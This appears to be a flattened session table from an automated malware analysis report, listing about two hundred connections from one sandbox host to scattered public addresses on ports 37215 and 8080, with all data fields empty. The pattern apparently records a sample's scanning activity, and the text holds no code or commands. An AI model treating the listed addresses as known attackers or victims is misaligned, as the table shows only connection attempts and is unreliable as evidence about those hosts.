                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23917192.168.2.2359608197.195.92.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23918192.168.2.234355274.12.227.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23919192.168.2.2342180197.128.210.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23920192.168.2.234783441.229.204.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23921192.168.2.2335586157.199.155.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23922192.168.2.2352558197.212.64.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23923192.168.2.2339870157.39.75.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23924192.168.2.2352548157.37.119.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23925192.168.2.2339142157.197.78.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23926192.168.2.2352600157.140.138.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23927192.168.2.2353306197.193.184.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23928192.168.2.233931041.163.47.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23929192.168.2.2342942157.105.98.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23930192.168.2.234585632.110.137.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23931192.168.2.2349888197.161.197.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23932192.168.2.234537841.66.57.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23933192.168.2.2344072157.25.245.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23934192.168.2.2353750197.182.130.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23935192.168.2.2355124138.40.15.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23936192.168.2.235256041.82.99.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23937192.168.2.233945241.161.75.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23938192.168.2.2346886197.173.159.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23939192.168.2.2354384157.119.50.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23940192.168.2.236015841.38.198.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23941192.168.2.2356420157.231.143.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23942192.168.2.2354182157.202.30.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23943192.168.2.2360774197.2.241.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23944192.168.2.2348346197.163.6.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23945192.168.2.2345490197.115.85.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23946192.168.2.2333232222.128.104.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23947192.168.2.234715041.150.223.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23948192.168.2.2336580110.163.24.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23949192.168.2.235460292.2.34.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23950192.168.2.235360441.252.87.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23951192.168.2.2344810157.57.119.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23952192.168.2.233902241.200.230.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23953192.168.2.2356708197.55.69.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23954192.168.2.234560684.31.70.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23955192.168.2.2337668197.8.10.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23956192.168.2.233726241.18.95.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23957192.168.2.2357326197.126.197.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23958192.168.2.234470441.133.97.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23959192.168.2.2341944157.101.25.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23960192.168.2.2359690197.79.210.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23961192.168.2.2335122157.99.199.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23962192.168.2.234563241.64.116.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23963192.168.2.2350004197.172.11.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23964192.168.2.2341794197.41.73.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23965192.168.2.2354582197.21.245.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23966192.168.2.234314241.202.31.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23967192.168.2.235495612.254.26.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23968192.168.2.2350098157.94.57.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23969192.168.2.233562641.118.72.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23970192.168.2.2344224157.217.211.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23971192.168.2.2345008197.119.63.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23972192.168.2.2336094197.214.14.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23973192.168.2.234710841.175.118.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23974192.168.2.235230641.227.203.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23975192.168.2.233621641.1.87.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23976192.168.2.2350050157.249.123.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23977192.168.2.2352574157.234.160.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23978192.168.2.2357054197.137.18.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23979192.168.2.234289841.176.184.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23980192.168.2.2349478116.27.102.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23981192.168.2.233723641.220.208.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23982192.168.2.2337074157.201.229.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23983192.168.2.2345142157.146.205.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23984192.168.2.2346082157.167.166.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23985192.168.2.2347750197.205.235.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23986192.168.2.2349382157.7.84.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23987192.168.2.2340842157.245.58.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23988192.168.2.2336768197.165.172.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23989192.168.2.234339841.250.198.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23990192.168.2.235164041.195.131.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23991192.168.2.233891041.118.161.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23992192.168.2.2343996197.184.213.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23993192.168.2.2336022157.211.64.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23994192.168.2.233987641.248.232.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23995192.168.2.234349441.49.22.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23996192.168.2.235217441.218.223.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23997192.168.2.2349368197.74.14.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23998192.168.2.2333196157.158.209.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23999192.168.2.2343782148.65.79.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24000192.168.2.2352950104.188.149.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24001192.168.2.2333838123.188.156.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24002192.168.2.235953070.242.40.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24003192.168.2.2348940137.58.81.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24004192.168.2.2342164178.67.222.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24005192.168.2.2354052118.45.75.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24006192.168.2.235663097.205.210.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24007192.168.2.234191677.136.192.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24008192.168.2.2337622202.63.34.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24009192.168.2.2344028102.187.198.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24010192.168.2.2360248140.238.145.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24011192.168.2.234137895.116.66.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24012192.168.2.2358354217.50.45.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24013192.168.2.2332768222.183.26.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24014192.168.2.2348790145.126.236.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24015192.168.2.234206893.120.0.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24016192.168.2.2350934169.17.86.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24017192.168.2.235327036.133.221.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24018192.168.2.234955888.230.105.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24019192.168.2.2334112140.182.114.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24020192.168.2.235964095.114.147.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24021192.168.2.235790699.41.223.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24022192.168.2.235445038.53.178.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24023192.168.2.234350217.50.93.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24024192.168.2.2356080223.243.236.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24025192.168.2.235267459.137.142.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24026192.168.2.2339196122.25.146.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24027192.168.2.2345550158.52.179.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24028192.168.2.2338422218.189.51.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24029192.168.2.2346874150.40.248.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24030192.168.2.234419251.183.43.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24031192.168.2.233814487.223.50.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24032192.168.2.2348708148.222.186.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24033192.168.2.2358600151.248.189.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24034192.168.2.2334118113.200.18.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24035192.168.2.2335386169.250.186.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24036192.168.2.2349694145.152.8.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24037192.168.2.233407441.166.227.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24038192.168.2.2348692217.245.201.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24039192.168.2.234353231.29.214.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24040192.168.2.2344568211.210.160.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24041192.168.2.2338668180.181.190.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24042192.168.2.235175258.238.149.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24043192.168.2.234210285.202.3.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24044192.168.2.2333620203.25.94.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24045192.168.2.234768067.97.253.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24046192.168.2.2346364199.151.224.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24047192.168.2.23557089.174.48.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24048192.168.2.2354356140.32.100.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24049192.168.2.233976252.145.59.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24050192.168.2.235342884.23.132.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24051192.168.2.2345856161.55.244.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24052192.168.2.2344654137.5.197.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24053192.168.2.2347086223.185.244.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24054192.168.2.234952048.47.214.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24055192.168.2.234289276.226.162.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24056192.168.2.233564617.54.171.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24057192.168.2.233730663.107.0.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24058192.168.2.235725039.112.134.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24059192.168.2.2348364183.90.170.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24060192.168.2.2342692189.233.47.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24061192.168.2.234677639.122.96.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24062192.168.2.2334706104.109.163.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24063192.168.2.2340694138.89.103.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24064192.168.2.2352388195.36.37.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24065192.168.2.235262281.138.105.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24066192.168.2.2352448201.3.27.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24067192.168.2.235656214.7.220.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24068192.168.2.23332169.195.78.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24069192.168.2.233291083.14.48.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24070192.168.2.2344122199.27.57.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24071192.168.2.2346494126.153.230.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24072192.168.2.2352914110.232.93.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24073192.168.2.2337496106.152.168.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24074192.168.2.235877248.124.126.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24075192.168.2.233410218.179.86.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24076192.168.2.235868669.99.36.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24077192.168.2.2342330202.83.66.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24078192.168.2.23355609.217.228.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24079192.168.2.2355366217.230.139.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24080192.168.2.2339324171.117.122.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24081192.168.2.2334164196.67.91.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24082192.168.2.2348770151.169.19.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24083192.168.2.2359770110.222.241.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24084192.168.2.2335606120.45.163.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24085192.168.2.234231650.172.29.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24086192.168.2.23403624.131.133.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24087192.168.2.2345588181.67.229.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24088192.168.2.2353448179.67.29.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24089192.168.2.2355790187.227.111.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24090192.168.2.234817685.241.1.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24091192.168.2.2352990222.111.119.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24092192.168.2.235656624.132.56.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24093192.168.2.2355138156.30.115.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24094192.168.2.234029454.104.109.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24095192.168.2.235917284.234.238.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24096192.168.2.234525467.193.189.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24097192.168.2.234390639.37.251.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24098192.168.2.2350054181.174.153.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24099192.168.2.2337290101.107.240.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24100192.168.2.2353734188.234.123.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24101192.168.2.2360292212.234.71.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24102192.168.2.2339044172.241.180.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24103192.168.2.2337244192.15.166.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24104192.168.2.233826052.244.133.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24105192.168.2.2360498172.241.41.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24106192.168.2.2343114221.199.147.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24107192.168.2.235057678.212.101.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24108192.168.2.2341718119.23.119.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24109192.168.2.2337020221.183.218.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24110192.168.2.234387263.146.13.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24111192.168.2.235442475.72.172.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24112192.168.2.235160062.34.217.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24113192.168.2.2334414177.200.161.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24114192.168.2.235872819.151.102.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24115192.168.2.2339562184.145.190.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24116192.168.2.2350666100.184.171.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24117192.168.2.234920049.167.246.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24118192.168.2.2334842207.123.127.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24119192.168.2.233755275.215.244.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24120192.168.2.233414685.239.72.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24121192.168.2.2337366142.233.183.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24122192.168.2.2339012163.154.193.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24123192.168.2.234822481.35.182.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24124192.168.2.234060623.238.141.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24125192.168.2.2353258191.64.68.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24126192.168.2.233799817.166.73.1328080
                                                        TimestampBytes transferredDirectionData


